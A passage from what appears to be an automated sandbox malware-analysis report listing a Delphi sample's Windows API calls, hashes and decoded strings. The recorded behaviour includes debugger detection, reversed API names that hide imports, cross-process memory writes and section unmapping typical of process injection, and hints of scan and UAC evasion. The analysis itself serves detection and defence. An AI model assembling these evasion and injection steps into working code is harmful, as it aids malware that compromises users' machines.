                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                                  • Opcode ID: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                  • Instruction ID: 7a2ce530077188beb64fcaa329d42f8f529dd1c126a4d666c34e84e99597f46f
                                                                                                                  • Opcode Fuzzy Hash: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                  • Instruction Fuzzy Hash: CB518771A5025C7AFB35DBA88C46FEFB7ADDB44744FC001E1AB44E6181D7749A448FA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13205 2b2894c-2b28971 LoadLibraryW 13206 2b28973-2b2898b GetProcAddress 13205->13206 13207 2b289bb-2b289c1 13205->13207 13208 2b289b0-2b289b6 FreeLibrary 13206->13208 13209 2b2898d-2b289ac call 2b27d78 13206->13209 13208->13207 13209->13208 13212 2b289ae 13209->13212 13212->13208
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                    • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                                                                  • API String ID: 1002360270-4067648912
                                                                                                                  • Opcode ID: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                  • Instruction ID: 02ea73879296f6fb652ecd6f8a8c70ed97984c2c0df079b6b8ef83159f43f98d
                                                                                                                  • Opcode Fuzzy Hash: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                  • Instruction Fuzzy Hash: 15F0FFF0AE9314EEE310A668AA49F93B3DCD380790F0089A9F90C87142CE701856AB20

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                  • API String ID: 35162468-539270669
                                                                                                                  • Opcode ID: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                  • Instruction ID: 362bd32dab411d132a2f7e16cf33f8bd7dadee8321ae1eea48ff71547cdee55a
                                                                                                                  • Opcode Fuzzy Hash: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                  • Instruction Fuzzy Hash: B4F0A770904358BAEB11A6B888887ECFBB99B05328F6447D0A439625E1E7710648CA51

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                    • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1897104825-0
                                                                                                                  • Opcode ID: 8d8d07eb54bc25ced58ed9f6b0dac5f25f37d9d312c3b8a3eadc90b1fe71cdfb
                                                                                                                  • Instruction ID: cb33507f0371fe68966ae60c1350d619d561fbe3f02e67a5a19d6daea7cbe546
                                                                                                                  • Opcode Fuzzy Hash: 8d8d07eb54bc25ced58ed9f6b0dac5f25f37d9d312c3b8a3eadc90b1fe71cdfb
                                                                                                                  • Instruction Fuzzy Hash: F821E071A50319BAEB11EBD4CC56FDE77BDEB48700F5044A5B304F7180DA74AA048B64

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                  • Opcode ID: 17ce24548237caae77c1116b07a1156187d5658262714ee2c4997fd7c8668167
                                                                                                                  • Instruction ID: a0088b32240204c0c93a2b628e941525b824f7999b1bb2216859d02b1e5a2f2c
                                                                                                                  • Opcode Fuzzy Hash: 17ce24548237caae77c1116b07a1156187d5658262714ee2c4997fd7c8668167
                                                                                                                  • Instruction Fuzzy Hash: 93413975B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3764614163-0
                                                                                                                  • Opcode ID: 8a3affb8e9959c6c716f62f522eb69936d7eef8f503e3b6eceb66db42d09d5e5
                                                                                                                  • Instruction ID: f136d701f76cf2452534bb099dad970d2e84d65eb49685b700266cf4fc268102
                                                                                                                  • Opcode Fuzzy Hash: 8a3affb8e9959c6c716f62f522eb69936d7eef8f503e3b6eceb66db42d09d5e5
                                                                                                                  • Instruction Fuzzy Hash: 9321E071A40319BEEB10EBA0DD56FDEB7BDEB04B00F5144A1B604F71D0DBB4AA048A64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                  • API String ID: 3130163322-2353454454
                                                                                                                  • Opcode ID: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                  • Instruction ID: b4156115f14dee8d39c35aa82bb7842d7eaaf1645aaf0c428994067ac26b9ea6
                                                                                                                  • Opcode Fuzzy Hash: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                  • Instruction Fuzzy Hash: 9211E5B2654258AFEB40EFA8DD41F9A77EDEB0C740F5144A0FA08D7250C634FD159B25
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                  • Opcode ID: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                  • Instruction ID: d23e4f91fa0960da7e273cc3fe5a9162521a241682b36118c561ac0a532a118c
                                                                                                                  • Opcode Fuzzy Hash: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                  • Instruction Fuzzy Hash: A1116DB5654308BFEB00EFA4DC41EAEB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                  • Opcode ID: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                  • Instruction ID: 8388146c6a95389dc2769de29c0f941351b9eb95c78c470c125d64e1f822c128
                                                                                                                  • Opcode Fuzzy Hash: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                  • Instruction Fuzzy Hash: 9D116DB5654308BFEB00EFA4DC41E9EB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                  • API String ID: 2521977463-737317276
                                                                                                                  • Opcode ID: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                  • Instruction ID: 4416821152efddc7df5757196051053e39fe12a0bcaf38e925373375cc6836f0
                                                                                                                  • Opcode Fuzzy Hash: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                  • Instruction Fuzzy Hash: 5E0140B5644318BFEB00EFA4DC41E9AB7FDEB4D700F9184A0F908D7650DA34A9159B64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                  • API String ID: 2719805696-3542721025
                                                                                                                  • Opcode ID: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                  • Instruction ID: ddbd965f134c26a55d869f5fea77957af354fd61dad7dd9a68ceb4cbc746443f
                                                                                                                  • Opcode Fuzzy Hash: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                  • Instruction Fuzzy Hash: 14012DB5654314AFDB00EFA8DC41E5AB7EDEB49700F908890B908D7650DA30AD159B75
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                  • API String ID: 3503870465-2520021413
                                                                                                                  • Opcode ID: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                  • Instruction ID: 49158d26d9311c15c17309da22fd1708ef641e0c56c2a26098a1afc479a9023a
                                                                                                                  • Opcode Fuzzy Hash: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                  • Instruction Fuzzy Hash: C201A2B4A44304AFEB00EFA4DC41E5EB7FEEB48740F9084E0F40497610DA34A905DA24
                                                                                                                  APIs
                                                                                                                  • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
